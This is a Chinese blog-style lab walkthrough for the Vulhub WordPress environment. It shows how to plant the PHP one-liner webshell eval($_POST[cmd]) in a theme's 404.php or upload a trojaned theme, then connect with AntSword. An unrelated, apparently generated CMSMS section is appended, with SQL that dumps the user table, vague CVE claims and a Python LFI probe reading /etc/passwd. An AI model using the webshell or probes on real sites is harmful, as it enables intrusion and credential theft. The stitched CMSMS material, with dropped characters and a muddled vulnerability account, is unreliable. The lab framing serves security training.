常⻅CMS漏洞 Vulhub-WordPress获取shell

WordPress是⼀个以PHPMySQL为平台的⾃由开源的博客软件和内容管理系统

姿势一  后台修改模板拿WebShell

1.进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装好

cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
选取中文

2.登陆WP后点击 【外 观】 --》 【编辑】 --》 404.php 在其404模板中插⼊⼀句话⽊⻢代码

思路是修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell
<?php eval($_POST[cmd]);?>
 

3.访问以下连接即可获取WebShell

/wp-content/themes/twentyfifteen/404.php

蚁剑连接

姿势二  上传主题拿WebShell

1.上传木马文件

接着上⼀个环境使用

从网上下载主题

将带有木马文件加入到主题中并将主题压缩为ZIP文件

2.安装成功后访问主题下的⽹站后⻔⽂件

/wp-content/themes/smartenterprise-free/999.php

3.蚁剑连接

### 关于 VulhubCMSMS 的设置与使用 #### 环境搭建 在 Vulhub 平台中,CMSMS 是一种见的 Web 应用程序漏洞实验目标。为了模拟真实环境中的安全测试场景,可以通过 Docker 容器快速部署 CMSMS 漏洞环境。具体操作如下: 1. **安装 Docker 和 Docker Compose** 需要先确保本地已正确安装并运行 Docker 及其扩展工具 Docker Compose。 2. **克隆 Vulhub 仓库** 使用以下命令下载官方 Vulhub 项目源码: ```bash git clone https://github.com/vulhub/vulhub.git ``` 3. **进入对应目录** 进入 CMSMS 相关漏洞的特定路径,例如针对 CVE-2019-9053 或其他版本漏洞的文件夹: ```bash cd vulhub/cmsms/CVE-2019-9053 ``` 4. **启动容器服务** 执行以下命令以初始化并启动所需的虚拟化环境: ```bash docker-compose up -d ``` 此过程会自动拉取必要的镜像资源,并完成基础配置工作[^1]。 #### 基本功能验证 一旦成功构建好上述实例之后,访问指定端口即可加载默认页面来确认是否正运作。通情况下,默认地址为 `http://localhost` 加上相应映射后的 HTTP(S)端口号(比如80或者443)。与此同时还可以利用 SQL 查询语句进一步探索后台数据库结构及其存储信息[^2]: ```sql show databases; use cmsms_db; show tables; select * from cms_users; ``` 这些指令有助于了解系统的整体布局以及潜在可被利用的数据点位置关系等情况。 #### 利用漏洞实现远程代码执行 (RCE) 当面对较低版本号如小于等于 v2.2.9.0 的 CMS Made Simple 软件时,存在严重的安全隐患——即未经身份认证便允许恶意行为者借助组合型缺陷(CVE编号分别为2019年发布的9053号条目加上稍晚些时候发现出来的另一个编号则为2021年的那个),从而达成完全控制受害主机的目的[^3]。 需要注意的是,在实际渗透过程中应当严格遵循法律法规框架内的许可范围行事,切勿非法入侵他人网络资产! --- ### 提供一段 Python 脚本来辅助自动化部分流程作为示例参考 下面给出了一段简单的 python 脚本用于演示如何通过 requests 库发送请求至可能存在该类问题的目标站点: ```python import requests url = 'http://target-site/index.php?page=' payload = '../../../../etc/passwd' response = requests.get(url + payload) if response.status_code == 200 and "root:" in response.text: print("[+] Vulnerable to LFI!") else: print("[-] Not vulnerable.") ``` 此脚本仅作学习用途展示原理,请谨慎对待线上生产环境中任何尝试性的动作。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值